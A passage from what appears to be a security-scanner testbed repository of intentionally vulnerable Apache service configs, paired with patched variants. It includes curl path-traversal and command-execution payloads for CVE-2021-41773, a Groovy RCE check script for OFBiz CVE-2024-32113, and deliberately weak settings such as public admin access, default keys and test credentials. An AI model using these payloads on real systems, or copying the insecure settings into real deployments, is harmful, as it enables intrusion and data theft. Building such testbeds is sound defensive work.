| session = settings.Session() 14 | session.add(user) 15 | session.commit() 16 | session.close() 17 | print('initial user finished') 18 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/DockerfileSafe: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | LABEL authors="am0o0" 3 | RUN apt update \ 4 | && apt install python3 python3-venv python3-pip -y 5 | RUN mkdir airflowWorkSpace 6 | WORKDIR airflowWorkSpace 7 | RUN mkdir config 8 | COPY webserver_config_safe.py config/webserver_config.py 9 | 10 | RUN python3 -m venv .venv 11 | RUN bash -c "source .venv/bin/activate && pip install apache-airflow" 12 | 13 | ENTRYPOINT ["bash","-c","export AIRFLOW_HOME='/airflowWorkSpace/config'; \ 14 | source .venv/bin/activate && airflow standalone"] 15 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/DockerfileUnSafe: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | LABEL authors="am0o0" 3 | RUN apt update \ 4 | && apt install python3 python3-venv python3-pip -y 5 | RUN mkdir airflowWorkSpace 6 | WORKDIR airflowWorkSpace 7 | RUN mkdir config 8 | COPY webserver_config_unsafe.py config/webserver_config.py 9 | 10 | RUN python3 -m venv .venv 11 | RUN bash -c "source .venv/bin/activate && pip install apache-airflow" 12 | 13 | ENTRYPOINT ["bash","-c","export AIRFLOW__CORE__TEST_CONNECTION=Enabled AIRFLOW_HOME='/airflowWorkSpace/config'; \ 14 | source .venv/bin/activate && airflow standalone "] 15 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/README.md: -------------------------------------------------------------------------------- 1 | # Initialize 2 | run `docker compose up` to start both vulnerable and safe airflow instances. 3 | 4 | # vulnerble airflow instance 5 | 1. You can now navigate to `http://172.20.0.2:8080/home`. Notice that no authorization is needed to access the panel. 6 | 2. Navigate to `http://localhost:8080/connection/add`. From there, you can select the HTTP connection type. 7 | 3. Notice that the Test button is enabled. With it, you can test the out-of-band interaction. 8 | 9 | You can find the reference here: [https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/webserver-authentication.html#webserver-authentication](https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/webserver-authentication.html#webserver-authentication) 10 | 11 | # safe airflow instance 12 | Unlike the unsafe setup, here the `AUTH_ROLE_PUBLIC = 'Admin'` is removed from the `config/webserver_config.py` file. Moreover, we don't export the `AIRFLOW__CORE__TEST_CONNECTION=Enabled` environment variable. 13 | 1. You can now navigate to [http://172.20.0.3:8080/home](http://localhost:8080/home). 14 | 2. Notice that, this time, you need to be authenticated to hit the endpoint. As a result of this, you will be redirect to the `/login` page. 15 | -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | networks: 4 | airflow: 5 | ipam: 6 | config: 7 | - subnet: 172.20.0.0/24 8 | 9 | services: 10 | airflow_unsafe: 11 | container_name: airflow_unsafe 12 | build: 13 | dockerfile: DockerfileUnSafe 14 | image: airflow_unsafe:v1 15 | networks: 16 | airflow: 17 | ipv4_address: 172.20.0.2 18 | ports: 19 | - "8080" 20 | airflow_safe: 21 | container_name: airflow_safe 22 | build: 23 | dockerfile: DockerfileSafe 24 | image: airflow_safe:v1 25 | networks: 26 | airflow: 27 | ipv4_address: 172.20.0.3 28 | ports: 29 | - "8080" -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/webserver_config_safe.py: -------------------------------------------------------------------------------- 1 | from __future__ import annotations 2 | import os 3 | from flask_appbuilder.const import AUTH_DB 4 | basedir = os.path.abspath(os.path.dirname(__file__)) 5 | WTF_CSRF_ENABLED = True 6 | WTF_CSRF_TIME_LIMIT = None 7 | AUTH_TYPE = AUTH_DB -------------------------------------------------------------------------------- /apache/airflow/ExposedUI/webserver_config_unsafe.py: -------------------------------------------------------------------------------- 1 | from __future__ import annotations 2 | import os 3 | from flask_appbuilder.const import AUTH_DB 4 | basedir = os.path.abspath(os.path.dirname(__file__)) 5 | WTF_CSRF_ENABLED = True 6 | WTF_CSRF_TIME_LIMIT = None 7 | AUTH_TYPE = AUTH_DB 8 | AUTH_ROLE_PUBLIC = 'Admin' -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/README.md: -------------------------------------------------------------------------------- 1 | # Apache APISIX Default API Token 2 | 3 | 4 | This directory contains the deployment configs for an Apache APISIX installation 5 | Apache APISIX has a built-in default API KEY. If the user does not proactively modify it (which few will), Lua scripts 6 | can be executed directly through the API interface, which can lead to RCE vulnerabilities. 7 | 8 | You can start the vulnerable service by running the command `docker compose up -d`. The deployed container has name `apache-apisix-defaul-api-token` and listens on port `9080`. 9 | 10 | The container that is not affected by the vulnerability is `apache-apisix-defaul-api-token-safe`, you can start it with `docker compose -f docker-compose-safe.yml up -d`, and the service listens on port `9081`. 11 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/config_api_key_change.yml: -------------------------------------------------------------------------------- 1 | apisix: 2 | node_listen: 9080 3 | enable_ipv6: false 4 | allow_admin: 5 | - 0.0.0.0/0 6 | enable_control: true 7 | admin_key: 8 | - name: "admin" 9 | key: "5b356d34fe8c4983ba07f6b7e9fbfb57" 10 | role: "admin" 11 | control: 12 | ip: "0.0.0.0" 13 | port: 9092 14 | etcd: 15 | host: 16 | - "http://etcd:2379" 17 | prefix: "/apisix" 18 | timeout: 30 19 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/config_default.yml: -------------------------------------------------------------------------------- 1 | apisix: 2 | node_listen: 9080 3 | enable_ipv6: false 4 | allow_admin: 5 | - 0.0.0.0/0 6 | enable_control: true 7 | control: 8 | ip: "0.0.0.0" 9 | port: 9092 10 | etcd: 11 | host: 12 | - "http://etcd:2379" 13 | prefix: "/apisix" 14 | timeout: 30 15 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/docker-compose-non-vulnerable.yml: -------------------------------------------------------------------------------- 1 | services: 2 | apache-apisix-defaul-api-token-safe: 3 | image: apache/apisix:2.11.0-alpine 4 | restart: unless-stopped 5 | ports: 6 | - "9081:9080" 7 | volumes: 8 | - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro 9 | depends_on: 10 | - etcd 11 | etcd: 12 | image: bitnami/etcd:3.4.15 13 | environment: 14 | ETCD_ENABLE_V2: "true" 15 | ALLOW_NONE_AUTHENTICATION: "yes" 16 | ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379" 17 | ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379" 18 | -------------------------------------------------------------------------------- /apache/apisix/Default_api_token/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | apache-apisix-defaul-api-token: 3 | image: apache/apisix:2.11.0-alpine 4 | restart: unless-stopped 5 | ports: 6 | - "9080:9080" 7 | volumes: 8 | - ./config_default.yml:/usr/local/apisix/conf/config.yaml:ro 9 | depends_on: 10 | - etcd 11 | etcd: 12 | image: bitnami/etcd:3.4.15 13 | environment: 14 | ETCD_ENABLE_V2: "true" 15 | ALLOW_NONE_AUTHENTICATION: "yes" 16 | ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379" 17 | ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379" 18 | -------------------------------------------------------------------------------- /apache/flink/CVE-2020-17519/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Apache Flink 3 | 4 | This directory contains the deployment configs for an Apache Flink installation 5 | that's vulnerable to CVE-2020-17519 (Directory Traversal via JobManager service) 6 | and unauthenticated user access. 7 | 8 | Please use flink version 1.11.1-scala_2.11-java11 for vulnerability related to 9 | CVE-2020-17519. 10 | 11 | The deployed service has name `apache-flink` and listens on port 12 | `8080`. 13 | -------------------------------------------------------------------------------- /apache/flink/apache-flink.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Apache Flink service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-flink 6 | labels: 7 | app: apache-flink 8 | version: ${flink_version} 9 | spec: 10 | ports: 11 | - protocol: TCP 12 | port: 8080 13 | name: http 14 | targetPort: 8081 15 | selector: 16 | app: apache-flink 17 | version: ${flink_version} 18 | tier: frontend 19 | type: LoadBalancer 20 | --- 21 | # The vulnerable Apache Flink service. 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: apache-flink 26 | labels: 27 | app: apache-flink 28 | version: ${flink_version} 29 | spec: 30 | selector: 31 | matchLabels: 32 | app: apache-flink 33 | version: ${flink_version} 34 | tier: frontend 35 | strategy: 36 | type: Recreate 37 | template: 38 | metadata: 39 | labels: 40 | app: apache-flink 41 | version: ${flink_version} 42 | tier: frontend 43 | spec: 44 | containers: 45 | - name: apache-flink 46 | image: flink:${flink_version} 47 | ports: 48 | - containerPort: 8081 49 | args: [ "jobmanager" ] 50 | env: 51 | - name: FLINK_PROPERTIES 52 | value: "jobmanager.rpc.address: jobmanager" 53 | -------------------------------------------------------------------------------- /apache/hive/weak_credentials/base.ldif: -------------------------------------------------------------------------------- 1 | dn: ou=test,dc=example,dc=com 2 | objectClass: organizationalUnit 3 | ou: test 4 | 5 | dn: uid=test,ou=test,dc=example,dc=com 6 | objectClass: inetOrgPerson 7 | uid: test 8 | sn: test 9 | givenName: test 10 | cn: test 11 | displayName: test 12 | userPassword: test -------------------------------------------------------------------------------- /apache/hive/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | ldap: 5 | image: osixia/openldap:1.5.0 6 | container_name: my-openldap-container 7 | environment: 8 | LDAP_ORGANISATION: "Example Inc." 9 | LDAP_DOMAIN: "example.com" 10 | LDAP_ADMIN_PASSWORD: "adminpassword" 11 | ports: 12 | - "389:389" 13 | volumes: 14 | - ldap_data:/var/lib/ldap 15 | - ldap_config:/etc/ldap/slapd.d 16 | 17 | phpldapadmin: 18 | image: osixia/phpldapadmin:latest 19 | container_name: my-phpldapadmin-container 20 | environment: 21 | PHPLDAPADMIN_LDAP_HOSTS: "ldap" 22 | ports: 23 | - "6443:443" 24 | depends_on: 25 | - ldap 26 | 27 | volumes: 28 | ldap_data: 29 | ldap_config: 30 | -------------------------------------------------------------------------------- /apache/hive/weak_credentials/hive-site.xml: -------------------------------------------------------------------------------- 1 | 2 | 18 | 19 | 20 | hive.server2.enable.doAs 21 | false 22 | 23 | 24 | hive.tez.exec.inplace.progress 25 | false 26 | 27 | 28 | hive.exec.scratchdir 29 | /opt/hive/scratch_dir 30 | 31 | 32 | hive.user.install.directory 33 | /opt/hive/install_dir 34 | 35 | 36 | tez.runtime.optimize.local.fetch 37 | true 38 | 39 | 40 | hive.exec.submit.local.task.via.child 41 | false 42 | 43 | 44 | mapreduce.framework.name 45 | local 46 | 47 | 48 | tez.local.mode 49 | true 50 | 51 | 52 | hive.execution.engine 53 | tez 54 | 55 | 56 | metastore.warehouse.dir 57 | /opt/hive/data/warehouse 58 | 59 | 60 | metastore.metastore.event.db.notification.api.auth 61 | false 62 | 63 | 64 | 65 | hive.security.authorization.manager 66 | org.apache.hadoop.hive.ql.security.authorization.plugin.sqlstd.SQLStdHiveAuthorizerFactory 67 | 68 | 69 | 70 | hive.security.authorization.enabled 71 | true 72 | 73 | 74 | 75 | hive.users.in.admin.role 76 | hive 77 | 78 | 79 | 80 | hive.server2.authentication 81 | LDAP 82 | 83 | 84 | hive.server2.authentication.ldap.url 85 | ldap://192.168.64.1:389 86 | 87 | 88 | hive.server2.authentication.ldap.baseDN 89 | dc=example,dc=com 90 | 91 | 92 | hive.server2.authentication.ldap.userDNPattern 93 | uid=%s,ou=test,dc=example,dc=com 94 | 95 | 96 | -------------------------------------------------------------------------------- /apache/http/CVE-2021-41773/README.md: -------------------------------------------------------------------------------- 1 | # Apache HTTP Server CVE-2021-41773 2 | 3 | Use existing docker images & instructions from https://github.com/BlueTeamSteve/CVE-2021-41773. 4 | 5 | ## Path Traversal & File Read (with mod_cgi disabled) 6 | 7 | ```sh 8 | docker pull blueteamsteve/cve-2021-41773:no-cgid 9 | docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid 10 | 11 | curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd 12 | ``` 13 | 14 | ## RCE (with mod_cgi enabled) 15 | 16 | ```sh 17 | docker pull blueteamsteve/cve-2021-41773:with-cgid 18 | docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid 19 | 20 | curl 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id' 21 | ``` 22 | -------------------------------------------------------------------------------- /apache/mod_proxy/CVE-2021-40438/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM httpd:2.4.48 2 | COPY ./config/httpd.conf /usr/local/apache2/conf/httpd.conf 3 | -------------------------------------------------------------------------------- /apache/mod_proxy/CVE-2021-40438/README.md: -------------------------------------------------------------------------------- 1 | # Apache mod_proxy CVE-2021-40438 2 | 3 | This directory contains the deployment configs for an Apache mod_proxy 4 | installation that's vulnerable to CVE-2021-40438, a SSRF. 5 | 6 | The deployed service has name `apache_mod_proxy_cve_2021_40438` and listens on 7 | port `8080`. 8 | 9 | 10 | -------------------------------------------------------------------------------- /apache/mod_proxy/CVE-2021-40438/apache-mod-proxy-cve-2021-40438.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing an Apache httpd instance with SSRF exploitable mod_proxy. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-mod-proxy-cve-2021-40438 6 | labels: 7 | app: apache-mod-proxy-cve-2021-40438 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 80 13 | selector: 14 | app: apache-mod-proxy-cve-2021-40438 15 | type: LoadBalancer 16 | --- 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: apache-mod-proxy-cve-2021-40438 21 | labels: 22 | app: apache-mod-proxy-cve-2021-40438 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: apache-mod-proxy-cve-2021-40438 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: apache-mod-proxy-cve-2021-40438 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: apache-mod-proxy-cve-2021-40438 38 | image: ${mod_proxy_img} 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /apache/nifi_api/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Apache NiFi API with Exposed UI 2 | 3 | This directory contains the deployment configs for a vulnerable Apache NiFi API 4 | version (1.12.0). 5 | 6 | The deployed service has name `apache-nifi-api` and listens on port `8080`. 7 | -------------------------------------------------------------------------------- /apache/nifi_api/exposed_ui/apache_nifi_api.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the unprotected Apache NiFI API service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-nifi-api 6 | labels: 7 | app: apache-nifi-api 8 | spec: 9 | ports: 10 | - protocol: TCP 11 | name: http 12 | port: 80 13 | targetPort: 8080 14 | selector: 15 | app: apache-nifi-api 16 | type: LoadBalancer 17 | --- 18 | # The vulnerable Apache NiFI API service with exposed UI. 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | name: apache-nifi-api 23 | labels: 24 | app: apache-nifi-api 25 | spec: 26 | selector: 27 | matchLabels: 28 | app: apache-nifi-api 29 | tier: frontend 30 | strategy: 31 | type: Recreate 32 | template: 33 | metadata: 34 | labels: 35 | app: apache-nifi-api 36 | tier: frontend 37 | spec: 38 | containers: 39 | - name: apache-nifi-api 40 | image: apache/nifi:1.12.0 41 | ports: 42 | - containerPort: 8080 43 | command: ["../scripts/start.sh"] 44 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2024-32113 2 | 3 | ## Vulnerable Release 4 | 5 | To create a vulnerable release, run `make_vulnerable.sh`. This will create a 6 | directory `vulnerable-ofbiz` containing ofbiz-framework release 18.12.12 and a 7 | docker image `ofbiz-docker-vulnerable` and start running the docker image on 8 | port 8443. 9 | 10 | ## Patched Release 11 | 12 | To create a patched release, run `make_patched.sh`. This will create a directory 13 | `patched-ofbiz` containing ofbiz-framework release 18.12.13 and a docker image 14 | `ofbiz-docker-patched` and start running the docker image on port 8443. 15 | 16 | ## Testing CVE-2024-32113 17 | 18 | With a vulnerable release running on port 8443 of your local machine, run 19 | `check_vulnerability.py` and it should display: 20 | 21 | ``` 22 | OFBIZ Instance at https://localhost:8443. is vulnerable to CVE-2024-32113. 23 | ``` 24 | 25 | With a patched release running on port 8443 of your local machine, run 26 | `check_vulnerability.py` and it should display: 27 | 28 | ``` 29 | Vulnerability not detected in https://localhost:8443. 30 | ``` 31 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/check_vulnerability.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """Checks if an OFBIZ instance at localhost:8443 is vulnerable to CVE-2024-32113.""" 3 | 4 | import re 5 | import requests 6 | import urllib3 7 | 8 | TARGET = 'https://localhost:8443' 9 | 10 | 11 | def TestIsVulnerable(target): 12 | """Tests if an OFBIZ instance at the given target is vulnerable to CVE-2024-32113. 13 | 14 | Args: 15 | target: The target URL of the OFBIZ instance. 16 | """ 17 | url = f'{target}/webtools/control/forgotPassword/foo/../ProgramExport' 18 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 19 | data = {'groovyProgram': "throw new Exception('id'.execute().text);"} 20 | 21 | response = requests.post(url, headers=headers, data=data, verify=False) 22 | match = re.search( 23 | r'java\.lang\.Exception:(\s*uid=.* gid=.* groups=.*)', response.text 24 | ) 25 | 26 | if match: 27 | print(f'OFBIZ Instance at {target} is vulnerable to CVE-2024-32113.') 28 | else: 29 | print(f'Vulnerability not detected in {target}.') 30 | 31 | 32 | def main(): 33 | urllib3.disable_warnings() 34 | TestIsVulnerable(TARGET) 35 | 36 | 37 | if __name__ == '__main__': 38 | main() 39 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/make_patched.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | echo "Cloning ofbiz-framework" 5 | git clone https://github.com/apache/ofbiz-framework.git patched-ofbiz 6 | 7 | echo "Checking out a patched release" 8 | cd patched-ofbiz 9 | git checkout release18.12.13 10 | 11 | echo "Building a docker image from the patched release" 12 | sudo docker build --tag ofbiz-docker-vuln . 13 | 14 | echo "Running the docker image" 15 | sudo docker run -it --name ofbiz-docker-patched -p 8443:8443 ofbiz-docker-vuln 16 | -------------------------------------------------------------------------------- /apache/ofbiz/cve-2024-32113/make_vulnerable.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | echo "Cloning ofbiz-framework" 5 | git clone https://github.com/apache/ofbiz-framework.git vulnerable-ofbiz 6 | 7 | echo "Checking out a vulnerable release" 8 | cd vulnerable-ofbiz 9 | git checkout release18.12.12 10 | 11 | echo "Building a docker image from the vulnerable release" 12 | sudo docker build --tag ofbiz-docker-vuln . 13 | 14 | echo "Running the docker image" 15 | sudo docker run -it --name ofbiz-docker-vulnerable -p 8443:8443 ofbiz-docker-vuln 16 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-12409/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr CVE-2019-12409 2 | 3 | This directory contains the deployment configs for an Apache Solr installation 4 | that's vulnerable to CVE-2019-12409 (RCE via unprotected JMX service). 5 | 6 | The deployed service has name `apache-solr-cve-2019-12409` and listens on port 7 | `18983`. 8 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-12409/apache-solr-cve-2019-12409.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the unprotected Apache Solr service. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-solr-cve-2019-12409 6 | labels: 7 | app: apache-solr-cve-2019-12409 8 | spec: 9 | ports: 10 | - protocol: TCP 11 | port: 18983 12 | targetPort: 18983 13 | selector: 14 | app: apache-solr-cve-2019-12409 15 | type: LoadBalancer 16 | # We use a static IP here because we need to explicitly specify the 17 | # -Djava.rmi.server.hostname option during solr startup. 18 | # This IP is reserved as a static IP in the tsunami-testbed GCP project. 19 | loadBalancerIP: 35.197.41.133 20 | --- 21 | # The vulnerable Apache Solr service. 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: apache-solr-cve-2019-12409 26 | labels: 27 | app: apache-solr-cve-2019-12409 28 | spec: 29 | selector: 30 | matchLabels: 31 | app: apache-solr-cve-2019-12409 32 | tier: frontend 33 | strategy: 34 | type: Recreate 35 | template: 36 | metadata: 37 | labels: 38 | app: apache-solr-cve-2019-12409 39 | tier: frontend 40 | spec: 41 | containers: 42 | - name: apache-solr-cve-2019-12409 43 | image: solr:8.2.0 44 | ports: 45 | - containerPort: 18983 46 | env: 47 | - name: SOLR_OPTS 48 | value: "-Djava.rmi.server.hostname=35.197.41.133" 49 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-17558/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr CVE-2019-17558 2 | 3 | This directory contains the deployment configs for an Apache Solr installation 4 | that's vulnerable to CVE-2019-17558 (RCE via velocity template). 5 | 6 | The deployed service has name `apache-solr-cve-2019-17558` and listens on port 7 | `8983`. 8 | -------------------------------------------------------------------------------- /apache/solr/CVE-2019-17558/apache-solr-cve-2019-17558.yaml: -------------------------------------------------------------------------------- 1 | # The k8s service exposing the Solr app version 8.2.0 vulnerable to CVE 2919-17558. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-solr-cve-2019-17558 6 | labels: 7 | app: apache-solr-cve-2019-17558 8 | spec: 9 | ports: 10 | - port: 8983 11 | selector: 12 | app: apache-solr-cve-2019-17558 13 | tier: frontend 14 | type: LoadBalancer 15 | --- 16 | # Solr app version 8.2.0. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: apache-solr-cve-2019-17558 21 | labels: 22 | app: apache-solr-cve-2019-17558 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: apache-solr-cve-2019-17558 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: apache-solr-cve-2019-17558 34 | tier: frontend 35 | spec: 36 | containers: 37 | - image: solr:8.2.0-slim 38 | name: apache-solr-cve-2019-17558 39 | command: ["solr-demo"] 40 | ports: 41 | - containerPort: 8983 42 | livenessProbe: 43 | httpGet: 44 | path: /solr/ 45 | port: 8983 46 | -------------------------------------------------------------------------------- /apache/spark/CVE-2022-33891/README.md: -------------------------------------------------------------------------------- 1 | Apache Spark CVE-2022-33891 2 | 3 | This directory contains the deployment config for Apache Spark. Versions earlier than 3.2.2 or 3.3.0 are vulnerable to this vulnerability. 4 | 5 | The deployed service listens on port `8080`. 6 | 7 | ## Vulnerable version 8 | docker-compose -f vuln-docker-compose.yml up -d 9 | 10 | ## Fixed version 11 | docker-compose -f fixed-docker-compose.yml up -d 12 | -------------------------------------------------------------------------------- /apache/spark/CVE-2022-33891/fixed-docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | spark: 5 | image: docker.io/bitnami/spark:3.2.4 6 | environment: 7 | - SPARK_MODE=master 8 | - SPARK_RPC_AUTHENTICATION_ENABLED=no 9 | - SPARK_RPC_ENCRYPTION_ENABLED=no 10 | - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no 11 | - SPARK_SSL_ENABLED=no 12 | ports: 13 | - '8080:8080' 14 | -------------------------------------------------------------------------------- /apache/spark/CVE-2022-33891/vuln-docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | spark: 5 | image: docker.io/bitnami/spark:3.1.1 6 | entrypoint: ["/bin/bash", "-c", "echo \"spark.acls.enable true\" >> /opt/bitnami/spark/conf/spark-defaults.conf && /opt/bitnami/scripts/spark/entrypoint.sh && /opt/bitnami/scripts/spark/run.sh"] 7 | environment: 8 | - SPARK_MODE=master 9 | - SPARK_RPC_AUTHENTICATION_ENABLED=no 10 | - SPARK_RPC_ENCRYPTION_ENABLED=no 11 | - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no 12 | - SPARK_SSL_ENABLED=no 13 | ports: 14 | - '8080:8080' 15 | -------------------------------------------------------------------------------- /apache/spark/exposed_api/README.md: -------------------------------------------------------------------------------- 1 | # Apache Spark Exposed API 2 | 3 | This directory contains a docker-compose file which sets up an Apache Spark environment which exposes the Spark API to an unauthenticated attacker. 4 | 5 | In the worst case such an exposed endpoint allows an unauthenticated attacker to execute arbitrary code by dynamically loading an attacker-controlled JAR and execute arbitrary code. 6 | 7 | ## Environment 8 | 9 | The deployed environment contains a Spark `master` node which exposes its' API endpoint on the default port `6066`. 10 | 11 | The environment also contains a worker node which processes the attacker-submitted task. 12 | 13 | The environment can be started with `docker compose up -d` 14 | -------------------------------------------------------------------------------- /apache/spark/exposed_api/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | master: 5 | image: docker.io/bitnami/spark:3.4.2 6 | entrypoint: ["/bin/bash", "-c", "echo \"spark.master.rest.enabled true\" >> /opt/bitnami/spark/conf/spark-defaults.conf && /opt/bitnami/scripts/spark/entrypoint.sh /opt/bitnami/scripts/spark/run.sh"] 7 | environment: 8 | - SPARK_MODE=master 9 | ports: 10 | - '6066:6066' 11 | slave: 12 | entrypoint: ["/bin/bash", "-c", "/opt/bitnami/scripts/spark/entrypoint.sh /opt/bitnami/scripts/spark/run.sh"] 13 | image: docker.io/bitnami/spark:3.4.2 14 | depends_on: 15 | - master 16 | healthcheck: 17 | # Our master takes a few seconds to be able to accept workers. 18 | # The start-worker.sh script exits with "0", even if it didn't connect successfully. However, it exits with 1 if the worker is already registered. 19 | # The following command switches the exit codes around. As soon as a worker is already registered, the health check is successful. 20 | test: bash -c 'if /opt/bitnami/spark/sbin/start-worker.sh spark://master:7077; then exit 1; else exit 0;fi' 21 | interval: 3s 22 | retries: 5 23 | start_period: 5s 24 | timeout: 5s 25 | -------------------------------------------------------------------------------- /apache/spark/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Apache Spark Exposed Web UI 2 | 3 | This directory contains a docker-compose file which sets up an Apache Spark environment which exposes it's web UI to an unauthenticated attacker. 4 | 5 | In the worst case such an exposed endpoint allows an unauthenticated attacker to retrieve data about tasks run by the server. 6 | 7 | ## Environment 8 | 9 | The deployed environment contains a Spark `master` node which exposes its web UI on the default port `8080`. 10 | 11 | The environment can be started with `docker compose up -d` 12 | -------------------------------------------------------------------------------- /apache/spark/exposed_ui/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | services: 4 | master: 5 | image: docker.io/bitnami/spark:3.4.2 6 | entrypoint: ["/bin/bash", "-c", "/opt/bitnami/scripts/spark/entrypoint.sh /opt/bitnami/scripts/spark/run.sh"] 7 | environment: 8 | - SPARK_MODE=master 9 | ports: 10 | - '8080:8080' 11 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-5638/README.md: -------------------------------------------------------------------------------- 1 | # Apache Struts CVE-2017-5638 2 | 3 | This directory contains the deployment configs for an Apache Struts installation 4 | that's vulnerable to CVE-2017-5638 (RCE via command injection in the content 5 | type header). 6 | 7 | The deployed service has name `apache-struts2-cve-2017-5638` and listens on port 8 | `80`. 9 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-5638/apache-struts-cve-2017-5638.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Apache Struts app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-struts2-cve-2017-5638 6 | labels: 7 | app: apache-struts2-cve-2017-5638 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 8080 13 | selector: 14 | app: apache-struts2-cve-2017-5638 15 | type: LoadBalancer 16 | --- 17 | # The vulnerable Apache Struts app. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: apache-struts2-cve-2017-5638 22 | labels: 23 | app: apache-struts2-cve-2017-5638 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: apache-struts2-cve-2017-5638 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: apache-struts2-cve-2017-5638 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: apache-struts2-cve-2017-5638 39 | image: piesecurity/apache-struts2-cve-2017-5638 40 | ports: 41 | - containerPort: 8080 42 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-9805/README.md: -------------------------------------------------------------------------------- 1 | # Apache Struts CVE-2017-9805 2 | 3 | This directory contains the deployment configs for an Apache Struts installation 4 | that's vulnerable to CVE-2017-9805 (RCE via Insecure Deserialisation). 5 | 6 | The deployed service has name `apache-struts-cve-2017-9805` and listens on port 7 | `80`. 8 | 9 | -------------------------------------------------------------------------------- /apache/structs/CVE-2017-9805/apache-struts-cve-2017-9805.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Apache Struts app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: apache-struts-cve-2017-9805 6 | labels: 7 | app: apache-struts-cve-2017-9805 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 8080 13 | selector: 14 | app: apache-struts-cve-2017-9805 15 | type: LoadBalancer 16 | --- 17 | # The vulnerable Apache Struts app. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 